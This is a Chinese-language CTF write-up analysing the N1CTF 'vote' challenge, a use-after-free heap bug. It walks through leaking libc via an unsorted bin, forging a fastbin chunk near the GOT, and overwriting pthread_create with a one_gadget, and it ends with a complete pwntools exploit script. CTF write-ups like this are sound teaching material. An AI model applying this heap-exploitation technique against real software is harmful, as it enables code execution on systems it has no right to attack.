N1CTF 塞题vote分析

 

　　N1CTF 塞题vote分析：这个题是一个uaf的漏洞题，我们先看看漏洞（如下图），这两部分是很明显的对比的啊。当单独的一个count数组的数据和堆里的数据相同时候，就会释放堆，堆释放后的count还会有指针指向这块内存，释放后我们能够（通过vote）修改数据，典型的uaf。那么我们修改构造（fd）的数据时候，下次申请特定地址的内存的时候，就可以对特定内存进行修改的。

　　

这里的sleep（）函数，pthread_create每次调用，都会sleep3秒，所以用脚本vote和cancel的时候总是导致无法触发uaf，调试时候需要在脚本中用time.sleep（3）来完成。

　　　　

 count数组的数值和堆里的fd数值保持一致。

　　

 

 　　

 

我们先来看几个函数，虽然不一定是核心函数，但可以增长知识哈：

void *memset(void *s, int ch, size_t n);

函数解释：将s中当前位置后面的n个字节 （typedef unsigned int size_t ）用 ch 替换并返回 s 。

memset：作用是在一段内存块中填充某个给定的值，它是对较大的结构体或数组进行清零操作的一种最快方法

 

解题过程：

结构体：

    {
        long int count  (malloc data)
        long int time    (malloc data+8)
        char name        (malloc data+16)        
    }

　　

三个位置分别为count，time，name。

 

构造伪堆，主要构造size和fd的数据：

　　

 

 具体利用过程：

　　一、leak地址：

　　通过申请0x80（+0x20的堆头）的堆，释放成unsortbins，成双向链表，fd和bk指向main_arena+88，在通过与libc的偏移计算出libc。

　　

 

二、构造伪堆：

构造好了伪造的fd之后，如果直接用pthread的地址做伪堆的地址话，会由于size检查导致分配失败。　哦，对了申请了两次伪堆，第一次是为了填充到我们的got表的地址而申请的，方法是在堆的24字节之后伪造堆，第二次是直接向共同表写入数据。　

 

 

 

 

　　

那么我们来找合适的size

 

 找到合适的size了（如下图），我们需要构造了伪堆的位置就是0x601ffa了。

 

 

成功修改了got的地址为我们的one_gadget的地址了，下面就是执行vote，触发one_gadget执行了。

 

 

利用思路总结：

1.首先leak出libc的地址，通过unsorted bin泄露出其中fd（count）的数据，即是main_arena +88，然后通过偏移计算libc的地址。

2.通过修改fastbin的fd，构造伪堆，伪堆在got_pthread的附近，然后写入数据，修改got_pthread为one_gadget的地址。

3.通过vote函数，触发pthread函数，即执行了one_gadget的命令。

 

exp如下：

 

#!/usr/bin/env python
from pwn import*
import time

local =1
debug = 1

if local:
    p = process('./vote')

else:
    p = remote("127.0.0.1",8080)

#context.log_level = 'debug'

def create(num,name):
    p.recvuntil("Action:")
    p.sendline("0")
    p.recvuntil("Please enter the name's size:")
    p.sendline(str(num))
    p.recvuntil("Please enter the name: ")
    p.sendline(name)

def show(num):
    p.recvuntil("Action:")
    p.sendline("1")
    p.recvuntil("Please enter the index:")
    p.sendline(str(num))

def vote(num):
    p.recvuntil("Action:")
    p.sendline("2")
    p.recvuntil("Please enter the index:")
    p.sendline(str(num))

def cancel(num):
    p.recvuntil("Action:")
    p.sendline("4")
    p.recvuntil("Please enter the index:")
    p.sendline(str(num))
def result():
    p.recvuntil("Action:")
    p.sendline("3")

def add(num,i):
    for i in range(0,i):
        vote(str(num))

#---------------leak addr----------------------------

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
ppp = libc.symbols['write']
print "write=",hex(ppp)

#print "HHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
#raw_input()


create(0x80,"AAAA")
create(0x80,"BBBB")
cancel(0)

#add(0,16)
#vote(0)
#time.sleep(4)
show(0)

p.recvuntil("count:")
main_arena = p.recv(16)
#main_arena = p.read(15)
print"main_arena =",str(main_arena)

libc_addr = int(main_arena)-0x3c4b78  
one = libc_addr + 0x4526a

print "libc_addr=",hex(libc_addr)
print "one=",hex(one)



#time.sleep(5)

#---------------fake heap----------------------------
#add(0,16)
got_pthread = 0x601ffa #0x602020
print "got_pthread:",hex(got_pthread)

payload = p64(0x60)+p64(got_pthread) +p64(0xabcdef)

create(0x40,payload)
create(0x40,"DDDD")

cancel(2)
cancel(3)

add(3,24)
create(0x40,"FF")

#---------------shellcode----------------------------

#write = libc_addr +0x3da490
write = libc_addr +libc.symbols['write']
#strlen = libc_addr +0x8b720
strlen = libc_addr +libc.symbols['strlen']
shellcode =  "AAAAAA"+ p64(one) + p64(write) + p64(strlen)
#shellcode = "AAAAAA"

create(0x40,"GG")

create(0x40,shellcode)

vote(0)


#gdb.attach(p)
p.interactive()